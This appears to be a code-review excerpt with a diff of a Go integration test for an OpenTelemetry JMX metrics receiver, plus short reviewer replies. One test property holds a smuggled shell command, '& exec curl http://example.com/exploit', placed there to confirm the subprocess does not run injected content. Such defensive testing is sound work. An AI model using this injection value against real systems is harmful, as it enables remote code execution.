receiver/jmxreceiver/integration_test.go

```diff
@@ -126,117 +134,123 @@ func getLogsOnFailure(t *testing.T, logObserver *observer.ObservedLogs) {
-			"my.label.name": "mylabel", "my.label.value": "myvalue",
-			"my.other.label.name": "myotherlabel", "my.other.label.value": "myothervalue",
-			// confirmation that arbitrary content isn't executed by subprocess
-			"one": "two & exec curl http://example.com/exploit && exit 123",
-		},
+			cfg := &Config{
+				CollectionInterval: 100 * time.Millisecond,
+				Endpoint:           fmt.Sprintf("%v:7199", hostname),
+				JARPath:            jar,
+				GroovyScript:       path.Join(".", "testdata", "script.groovy"),
+				OTLPExporterConfig: otlpExporterConfig{
+					Endpoint: "127.0.0.1:0",
+					TimeoutSettings: exporterhelper.TimeoutSettings{
+						Timeout: 1000 * time.Millisecond,
+					},
+				},
+				Password: "cassandra",
+				Username: "cassandra",
+				Properties: map[string]string{
+					// should be used by Autoconfigure to set resource attributes
+					"otel.resource.attributes": "myattr=myvalue,myotherattr=myothervalue",
+					// test script sets dp labels from these system property values
+					"my.label.name": "mylabel", "my.label.value": "myvalue",
+					"my.other.label.name": "myotherlabel", "my.other.label.value": "myothervalue",
+					// confirmation that arbitrary content isn't executed by subprocess
+					"one": "two & exec curl http://example.com/exploit && exit 123",
+				},
+			}
+			require.NoError(t, cfg.validate())
+
+			consumer := new(consumertest.MetricsSink)
+			require.NotNil(t, consumer)
+
+			receiver := newJMXMetricReceiver(params, cfg, consumer)
+			require.NotNil(t, receiver)
+			defer func() {
+				require.Nil(t, receiver.Shutdown(context.Background()))
+			}()
+
+			require.NoError(t, receiver.Start(context.Background(), componenttest.NewNopHost()))
+
+			require.Eventually(t, func() bool {
+				found := consumer.DataPointCount() > 0
+				if !found {
+					return false
+				}
+
+				metric := consumer.AllMetrics()[0]
+				require.Equal(t, 1, metric.DataPointCount())
+
+				rm := metric.ResourceMetrics().At(0)
+				resource := rm.Resource()
+				attributes := resource.Attributes()
+				lang, ok := attributes.Get("telemetry.sdk.language")
+				require.True(t, ok)
+				require.Equal(t, "java", lang.StringVal())
+
+				sdkName, ok := attributes.Get("telemetry.sdk.name")
+				require.True(t, ok)
+				require.Equal(t, "opentelemetry", sdkName.StringVal())
+
+				version, ok := attributes.Get("telemetry.sdk.version")
+				require.True(t, ok)
+				require.NotEmpty(t, version.StringVal())
+
+				customAttr, ok := attributes.Get("myattr")
+				require.True(t, ok)
+				require.Equal(t, "myvalue", customAttr.StringVal())
+
+				anotherCustomAttr, ok := attributes.Get("myotherattr")
+				require.True(t, ok)
+				require.Equal(t, "myothervalue", anotherCustomAttr.StringVal())
+
+				ilm := rm.InstrumentationLibraryMetrics().At(0)
+				require.Equal(t, "io.opentelemetry.contrib.jmxmetrics", ilm.InstrumentationLibrary().Name())
+				require.Equal(t, "1.0.0-alpha", ilm.InstrumentationLibrary().Version())
```

Comment:
This needs to change in the gatherer so will eventually be an issue.

Reply:
Oh my, I didn't even notice.  That'll be a fun one.

Reply:
https://github.com/open-telemetry/opentelemetry-java-contrib/pull/77